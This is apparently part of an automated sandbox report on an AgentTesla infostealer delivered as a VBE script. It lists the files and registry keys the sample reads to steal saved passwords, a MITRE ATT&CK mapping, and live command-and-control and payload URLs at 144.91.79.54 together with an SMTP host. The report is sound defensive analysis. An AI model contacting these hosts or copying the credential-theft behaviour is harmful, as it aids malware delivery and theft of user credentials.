                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadline.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6176, type: MEMORYSTR
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6176, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: dump.pcap, type: PCAP
                  Source: Yara matchFile source: 8.2.RegSvcs.exe.370000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000008.00000002.3315071411.0000000002701000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.3315071411.0000000002727000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 6176, type: MEMORYSTR

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information311
                  Scripting                  		Valid Accounts121
                  Windows Management Instrumentation                  		311
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  File and Directory Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts1
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		311
                  Process Injection                  		1
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		24
                  System Information Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts2
                  PowerShell                  		Logon Script (Windows)Logon Script (Windows)1
                  DLL Side-Loading                  		Security Account Manager111
                  Security Software Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  Masquerading                  		NTDS1
                  Process Discovery                  		Distributed Component Object ModelInput Capture2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script131
                  Virtualization/Sandbox Evasion                  		LSA Secrets131
                  Virtualization/Sandbox Evasion                  		SSHKeylogging23
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
                  Process Injection                  		Cached Domain Credentials1
                  Application Window Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                  System Network Configuration Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1539284 Sample: Ref#150689.vbe Startdate: 22/10/2024 Architecture: WINDOWS Score: 100 34 api.ipify.org 2->34 42 Suricata IDS alerts for network traffic 2->42 44 Found malware configuration 2->44 46 Malicious sample detected (through community Yara rule) 2->46 48 5 other signatures 2->48 8 wscript.exe 1 2->8         started        11 wscript.exe 32 1 2->11         started        signatures3 process4 dnsIp5 58 Wscript starts Powershell (via cmd or directly) 8->58 60 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->60 15 powershell.exe 43 8->15         started        18 powershell.exe 37 8->18         started        40 144.91.79.54, 49705, 80 CONTABODE Germany 11->40 32 C:\Users\user\AppData\...\dirDChDJoZeRjid.vbs, ISO-8859 11->32 dropped 62 System process connects to network (likely due to code injection or exploit) 11->62 64 Potential evasive VBS script found (sleep loop) 11->64 66 Windows Shell Script Host drops VBS files 11->66 68 Suspicious execution chain found 11->68 file6 signatures7 process8 signatures9 70 Writes to foreign memory regions 15->70 72 Injects a PE file into a foreign processes 15->72 20 RegSvcs.exe 15 2 15->20         started        24 wermgr.exe 19 15->24         started        26 conhost.exe 15->26         started        28 wermgr.exe 19 18->28         started        30 conhost.exe 18->30         started        process10 dnsIp11 36 162.254.34.31, 49764, 587 VIVIDHOSTINGUS United States 20->36 38 api.ipify.org 104.26.13.205, 443, 49751 CLOUDFLARENETUS United States 20->38 50 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 20->50 52 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 20->52 54 Tries to steal Mail credentials (via file / registry access) 20->54 56 2 other signatures 20->56 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  Ref#150689.vbe11%ReversingLabsScript-WScript.Trojan.GuLoader

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  https://api.ipify.org/0%URL Reputationsafe
                  https://account.dyn.com/0%URL Reputationsafe
                  https://api.ipify.org/t0%URL Reputationsafe
                  http://schemas.micro0%URL Reputationsafe
                  https://api.ipify.org0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ipify.org
                  		104.26.13.205
                  		truefalse
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                    • URL Reputation: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://account.dyn.com/RegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmpfalse
                    • URL Reputation: safe
                    		unknown
                    http://144.91.79.54/$wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpfalse
                      		unknown
                      http://144.91.79.54/0Gwscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        http://144.91.79.54/Lwscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          http://144.91.79.54/e4wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            http://144.91.79.54:80/1210/thEh4UQ3nf0RsZGPSynf.txtxwscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              http://144.91.79.54/Pwscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://api.ipify.org/tRegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://144.91.79.54:80/1210/filewscript.exe, 00000000.00000003.2098255050.000001E8967A7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2097077335.000001E8967A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://schemas.microwscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://144.91.79.54/Twscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		unknown
                                    http://144.91.79.54/1210/wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://api.ipify.orgRegSvcs.exe, 00000008.00000002.3312540356.0000000000372000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                      • URL Reputation: safe
                                      		unknown
                                      http://144.91.79.54/Dwscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        http://144.91.79.54/1210/filewscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101373201.000001E896798000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100564601.000001E89858F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown
                                          http://144.91.79.54/1210/swscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2088250036.000001E89858A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2074981941.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		unknown
                                            http://144.91.79.54/1210/rwscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2079284658.000001E89675B000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		unknown
                                              http://144.91.79.54/wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		unknown
                                                http://144.91.79.54/1210/8wscript.exe, 00000000.00000003.2100463211.000001E89670E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101869677.000001E89671E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2102363632.000001E896720000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103065879.000001E896720000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		unknown
                                                  http://144.91.79.54/lwscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		unknown
                                                    http://144.91.79.54/1210/v8wscript.exe, 00000000.00000002.2103647837.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100052014.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896786000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2100684872.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093193510.000001E896783000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101298327.000001E896785000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		unknown
                                                      http://144.91.79.54/1210/vswscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://144.91.79.54/1210/vwscript.exe, wscript.exe, 00000000.00000003.2093238088.000001E89675B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2104531570.000001E898825000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2102491620.00000007D56F1000.00000004.00000010.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099250622.000001E896A98000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099149868.000001E898588000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		unknown
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000008.00000002.3315071411.00000000026B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://144.91.79.54/BA;0wscript.exe, 00000000.00000003.2100684872.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2101890507.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2103647837.000001E896790000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2099439406.000001E896790000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		unknown
                                                            http://144.91.79.54/8wscript.exe, 00000000.00000003.2079284658.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2075029116.000001E89676D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		unknown
                                                              http://144.91.79.54/1210/thEh4UQ3nf0RsZGPSynf.txtwscript.exe, 00000000.00000003.2087672638.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089344734.000001E896780000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089375576.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2087806504.000001E896768000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2089022857.000001E89677D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2093238088.000001E896768000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		unknown

                                                                World Map of Contacted IPs

                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
                                                                • 50% < No. of IPs < 75%
                                                                • 75% < No. of IPs

                                                                Public IPs

                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                144.91.79.54
                                                                		unknownGermany
                                                                		51167CONTABODEtrue
                                                                104.26.13.205
                                                                		api.ipify.orgUnited States
                                                                		13335CLOUDFLARENETUSfalse
                                                                162.254.34.31
                                                                		unknownUnited States
                                                                		64200VIVIDHOSTINGUStrue

                                                                General Information

                                                                Joe Sandbox version:41.0.0 Charoite
                                                                Analysis ID:1539284
                                                                Start date and time:2024-10-22 14:45:10 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:0h 5m 38s
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:default.jbs
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:14
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • HCA enabled
                                                                • EGA enabled
                                                                • AMSI enabled
                                                                Analysis Mode:default
                                                                Analysis stop reason:Timeout
                                                                Sample name:Ref#150689.vbe
                                                                Detection:MAL
                                                                Classification:mal100.troj.spyw.expl.evad.winVBE@14/19@1/3
                                                                EGA Information:
                                                                • Successful, ratio: 100%
                                                                HCA Information:
                                                                • Successful, ratio: 100%
                                                                • Number of executed functions: 58
                                                                • Number of non-executed functions: 11
                                                                Cookbook Comments:
                                                                • Found application associated with file extension: .vbe

                                                                Warnings

                                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                • Excluded IPs from analysis (whitelisted): 13.89.179.12
